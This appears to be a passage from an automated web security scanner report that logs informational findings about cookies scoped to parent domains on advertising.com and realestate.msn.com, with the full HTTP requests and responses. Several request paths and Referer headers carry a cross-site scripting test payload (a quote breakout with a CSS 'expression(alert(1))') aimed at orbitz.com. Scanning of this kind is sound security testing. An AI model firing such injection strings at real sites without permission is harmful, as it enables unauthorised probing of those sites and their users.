Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; F1=BAWJI1EBAAAABAAAAIAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=TPQQKfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BSIFyat6oE!; ACID=WR910012964108340027; 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3TghwGitSqzY5976PrTsin6rxpK73x54NJs1OwWgDjYYaZeaDswzMIA; C2=eVCSNNbjHEEqGhO; 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; ROLL=gqwLbPcy+hFCk4Ept5x+lCN!; 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://www.taxact.com/10tax.asp?sc=104072450109&p=1002450109_160x600_btf_ON
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 01 Feb 2011 15:37:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 196
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:37:15 GMT
Connection: close
Set-Cookie: C2=riCSNNbjHEEqGfugigQvJVAcRujZvkgBoC; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:15 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 5052657456=_4d48255e,5052657456,749715^964772^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.taxact.com/10tax.asp?sc=104072450109&p=1002450109_160x600_btf_ON">here</a>.</h2>
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=lrXSNJpwHg02Fq0BdbdhKdwUwXoSH8Y4Fq0BYTehKdQ3gZoSHQTnGq0BF2phKdAohXoSHYZ4Fq0BKGehKdwohXoSHca4Fq0BiGehKdQshXoSwOIAM/oRhI7YBwAoGj0r1NQcKasLGKmAI9YRoN53DkL3F+ygPTw6TV4UsuWB/0mBhca7FIaWG4frMaw41Z0CkqlB6bjBLq6bCwWZGj6r4fQsMagJwa3BW8oBm0I9HsfzFeysNeQQoaoSs2zB1xmRdC; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
F1=BUueJ1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpHmL!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
ROLL=v5Q2V0M/k7zqHkG!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
11479363=_4d497ae5,6123380717,747145^961923^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BcUJI1EBAAAABAAAAEAAgEA; BASE=YnQI+8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAO!; ROLL=v5Q2V0MtUuzqOtG!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.961923.747145.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 02 Feb 2011 15:40:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:40:21 GMT
Connection: close
Set-Cookie: C2=lrXSNJpwHg02Fq0BdbdhKdwUwXoSH8Y4Fq0BYTehKdQ3gZoSHQTnGq0BF2phKdAohXoSHYZ4Fq0BKGehKdwohXoSHca4Fq0BiGehKdQshXoSwOIAM/oRhI7YBwAoGj0r1NQcKasLGKmAI9YRoN53DkL3F+ygPTw6TV4UsuWB/0mBhca7FIaWG4frMaw41Z0CkqlB6bjBLq6bCwWZGj6r4fQsMagJwa3BW8oBm0I9HsfzFeysNeQQoaoSs2zB1xmRdC; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
Set-Cookie: F1=BUueJ1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
Set-Cookie: BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpHmL!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M/k7zqHkG!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
Set-Cookie: 11479363=_4d497ae5,6123380717,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Content-Length: 1631

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE> </TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=mrXSNNbjHEEqG+J; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
F1=BYueJ1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
BASE=TPQQKfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BSIFyatzhE!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
ROLL=gqwLYPc8XjFCtxE!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:22 GMT; path=/
25807272=_4d497ae6,1141323065,747145^961923^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: r1-ads.ace.advertising.com
Proxy-Connection: Keep-Alive
Cookie: A07L=3TghwGitSqzY5976PrTsin6rxpK73x54NJs1OwWgDjYYaZeaDswzMIA; ACID=WR910012964108340027; F1=B4VJI1EBAAAABAAAAEAAgEA; BASE=TPQQLfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BC!; ROLL=gqwLYPcy+hFCk4E!; C2=eVCSNNbjHEEqGhO

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=eVCSNNbjHEEqGhO; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
F1=B4VJI1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
BASE=TPQQLfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BC!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
ROLL=gqwLYPcy+hFCk4E!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: r1-ads.ace.advertising.com
Proxy-Connection: Keep-Alive
Cookie: A07L=3TghwGitSqzY5976PrTsin6rxpK73x54NJs1OwWgDjYYaZeaDswzMIA; ACID=WR910012964108340027; F1=BoOqF1EBAAAABAAAAMAAgEA; BASE=TPQQMfQBxZgcD514adQ2mjv0dgQLL5F!; ROLL=gqwLaPc0+hFCnPF/wmx+n1sA5LOxHdM!; C2=qjaRNJ7+AcuoGwwsNiQQoaAc

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
F1=BcUJI1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
BASE=YnQI+8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAO!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
ROLL=v5Q2V0MtUuzqOtG!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.918410.749715.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 01 Feb 2011 15:22:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:22:47 GMT
Connection: close
Set-Cookie: C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: F1=BcUJI1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: BASE=YnQI+8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAO!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: ROLL=v5Q2V0MtUuzqOtG!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Content-Length: 1043

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

11.219. http://realestate.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=972771e7f6834558a0e38a98ab1cff0e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=95187FB7560B4B81B88E519BA8908F2A; domain=.msn.com; expires=Sun, 21-Aug-2011 15:40:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: realestate.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:40:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=972771e7f6834558a0e38a98ab1cff0e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=95187FB7560B4B81B88E519BA8908F2A; domain=.msn.com; expires=Sun, 21-Aug-2011 15:40:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.220. http://realestate.msn.com/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.msn.com
Path:	/slideshow.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=26fbb56ea10c4d5cac17f2337767ccbe; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=402987C945B0433BA1FE4A28CCFD831E; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:37:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=26fbb56ea10c4d5cac17f2337767ccbe; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=402987C945B0433BA1FE4A28CCFD831E; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 50039

